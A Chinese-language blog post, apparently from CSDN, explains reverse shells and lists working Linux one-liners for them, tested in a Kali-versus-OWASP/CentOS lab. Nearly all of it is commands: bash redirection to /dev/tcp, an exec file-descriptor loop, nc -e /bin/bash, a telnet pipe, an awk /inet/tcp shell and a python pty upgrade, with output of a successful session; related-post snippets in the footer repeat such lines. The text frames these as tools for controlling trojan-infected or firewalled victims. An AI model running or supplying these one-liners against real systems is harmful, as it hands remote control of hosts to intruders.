Linux常用的反弹shell命令

已于 2023-06-23 17:37:16 修改
阅读量2.5k 收藏 10
点赞数 1
文章标签: 网络安全 系统安全
于 2023-04-24 16:18:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63200360/article/details/130341499
版权

前言

(1)什么是反弹shell?

  反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

(2)为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。 

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

一、常用的反弹shell命令

1.使用Bash进行反弹

kali作为攻击主机,owasp作为被入侵主机,只要能在入侵主机上正常运行Linux命令就能实现反弹,利用Bash命令重定向。

(1).在kali上启动端口监听

nc -lvp 555
#这个端口可以是任意端口,只要不是被占用或者防火墙阻挡都可以用。

(2)在owasp上运行反弹命令

bash -i >& /dev/tcp/192.168.27.130/555 0>&1

命令解析:

bash -i              #打开一个交互的bash

>&                    #将标准错误输出合并 并定向到标准输出,也可以写成&>

/dev/tcp/192.168.27.130/555        # 意为调用scoket,建立socket连接,其中192.168.27.130为要反弹到的主机,555为端口。

0>&1                                              #标准输入重定向到标椎输出,实现你与反弹出来的shell的交互,可以接受用户的输入,0>&1和0<&1是一样的作用

(3)反弹成功在kali上执行命令

root@owaspbwa:~# pwd
pwd
/root
root@owaspbwa:~# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:f8:36:e7  
          inet addr:192.168.27.132  Bcast:192.168.27.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fef8:36e7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:430 errors:0 dropped:0 overruns:0 frame:0
          TX packets:116 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:28786 (28.7 KB)  TX bytes:15275 (15.2 KB)
          Interrupt:18 Base address:0x1400 

2.使用exec执行shell的方式

(1)在kali上执行,监听555端口

nc -lvp 555

(2)在owasp上执行

exec 5<> /dev/tcp/192.168.27.130/555; cat <&5 | while read line; do $line 2>&5 >&5; done

#在owasp上执行完命令,返回kali端是没有任何提示付的符,直接执行命令即可。

3.其他方式

(1)在klai上监听555端口

nc -lvp 555

(2)在owasp执行命令

exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/192.168.27.130/555; sh <&196 >&196 2>&196

#执行完返回到kali里也是没有任何提示符,可直接执行命令

4.使用nc进行反弹

(1)在kali上进行端口监听

nc -lvp 555

(2)在centos7上执行反弹命令

nc -e /bin/bash 192.168.27.130 555

#执行完kali没有提示符,直接执行命令即可。

5.使用Telnet进行反弹

(1)需要在kali上开启两个端口,一个用来输入。一个用来输出。

nc -lvp 444

nc -lvp 555

#打开两个命令窗口同时执行

(2)在centos7上执行命令

telnet 192.168.27.130 444 | /bin/bash | telnet 192.168.27.130 555

#444为输入端口,555作为输出端口,在444端口执行命令,555端口输出结果。centos默认没有安装Telnet服务的要进行安装才能使用

6.使用awk进行反弹

(1)在klai监听端口

nc -lvp 555

(2)在centos上执行命令

awk 'BEGIN{s="/inet/tcp/0/192.168.27.130/555";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

#执行完命令再kali没有任何提示符,直接执行命令即可。

7.建立交互式shell

反弹完shell之后可以建立交互式的shell,这样操作更加方便。

python -c 'import pty; pty.spawn("/bin/bash")' 

困成狗l
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 917
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
Linux Shell常用shell命令
热血青年
12-15 946
Linux Shell常用shell命令 一、文件、目录操作命令 1、ls命令 功能:显示文件和目录的信息 ls 以默认方式显示当前目录文件列表 ls -a 显示所有文件包括隐藏文件 ls -l 显示文件属性,包括大小,日期,符号连接,是否可读写及是否可执行 ls -lh 显示文件的大小,以容易理解的格式印出文件大小 (例如 1K 234M2G) ls -lt 显示文件,按照修改时间排序 2、cd命令 功能:改名目录 cd dir 切换到当前目录下的dir目录 cd / 切换到根目录 cd … 切换到到上一
Linux反弹shell
good good study
04-21 4171
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 667
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
linux反弹shell方法
weixin_53747497的博客
07-12 2007
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
LINUX shell反弹篇(一)
胖虎的博客
10-26 2093
linuxshell反弹的方法及原理
带你了解LINUX反弹Shell的各种姿势(超详细)
xf555er的博客
11-27 1705
LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势。
Linuxshell常用的基础命令
X_pang的博客
08-27 313
一. diff 用法:diff [options]  files|directorys 输出信息: [num1,num2] [a|c|d] [num3,num4] num1,num2 第一个文件中的行 a 添加 c 更改 d 删除 < 第一个文件中的内容 > 第二个文件中的内容 num3,num4 第二个文件中的行 常用参数: -b 忽略空格 -B 忽略空行 -i 忽略大小写 -c 显示文件所有内容并标示不同 -r 对比目录
Linux常用shell基本命令大全
03-15
shell常用命令,最普通常用命令汇总,适合初中级读写shell程序,包括流程控制命令、各种字符数值判断等。 略…………………………………………………………………………………………………………………………...
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux 常用shell命令
04-21
个人日常工作中,常用shell命令总结,从简单到复杂,各种操作对于数据分析人员来说也有一定的帮助
linux shell命令常用快捷键
01-10
(这个非常好用,输入关键字就调出以前的命令了) Ctrl + c 终止命令 Ctrl + d 退出shell Ctrl + z 转入后台运行.. alt键比较少用,因为很多地方与远程登陆工具是有冲突的.. Alt + f 切换光标前的字母 Alt + b 切换...
Linux常用shell命令记录
01-20
本文章记录我在linux系统下常用或有用的系统级命令,包括软硬件查看、修改命令,有CPU、内存、硬盘、网络、系统管理等命令。但本文不打算介绍生僻命令,也不介绍各个linux发行版下的特有命令,且以后会持续更新。 ...
Linux反弹shell
weixin_64338385的博客
11-26 2273
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
Linux环境下的shell反弹
qq_55213436的博客
07-05 2051
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9314
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
Linux 反弹 Shell
sankgao 的博客
01-12 578
Linux 反弹 Shell
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2910
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
linux常用shell命令实验
09-09
你好!我很乐意帮助你了解一些常用Linux shell命令。以下是一些常见的命令及其用法: 1. `ls`:列出当前目录下的文件和文件夹。 示例:`ls` 2. `cd`:切换到指定目录。 示例:`cd /path/to/directory` 3. `pwd`:显示当前所在目录的路径。 示例:`pwd` 4. `mkdir`:创建新目录。 示例:`mkdir directory_name` 5. `rm`:删除文件或目录。 示例:`rm file_name` 或 `rm -r directory_name`(递归删除) 6. `cp`:复制文件或目录。 示例:`cp source_file destination_file` 或 `cp -r source_directory destination_directory`(递归复制) 7. `mv`:移动文件或重命名文件。 示例:`mv source_file destination_file` 或 `mv source_file new_file_name` 8. `cat`:显示文件内容。 示例:`cat file_name` 9. `grep`:根据模式查找文件内容。 示例:`grep pattern file_name` 10. `chmod`:修改文件或目录的权限。 示例:`chmod permissions file_name` 或 `chmod -R permissions directory_name`(递归修改) 11. `chown`:修改文件或目录的所有者。 示例:`chown new_owner file_name` 这里只是列举了一些常见的命令Linux shell有很多其他功能强大的命令可以使用。如果你有更具体的问题或需要了解更多命令,请告诉我!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值